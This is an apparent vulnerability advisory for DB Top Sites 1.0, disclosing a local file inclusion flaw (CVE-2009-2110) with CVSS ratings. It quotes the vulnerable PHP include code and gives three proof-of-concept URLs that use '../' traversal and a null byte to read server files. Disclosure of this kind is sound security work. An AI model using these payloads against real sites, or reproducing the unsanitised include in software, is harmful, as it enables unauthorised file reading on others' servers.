DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability

2009.06.23
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-2110
CWE: CWE-22


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

###################################################################### [+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability [+] Discovered By SirGod [+] www.mortal-team.org ####################################################################### [+] Local File Inclusion - Vulnerable code is everywhere ------------------------------------------------------------------------------------------------------- if ( $u != "" ) { if ( file_exists( "./sites/session/$u.session.php" ) ){ include "./sites/session/$u.session.php"; include "./sites/$u.php"; ------------------------------------------------------------------------------------------------------- - PoC's http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00 http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00 http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00 #######################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top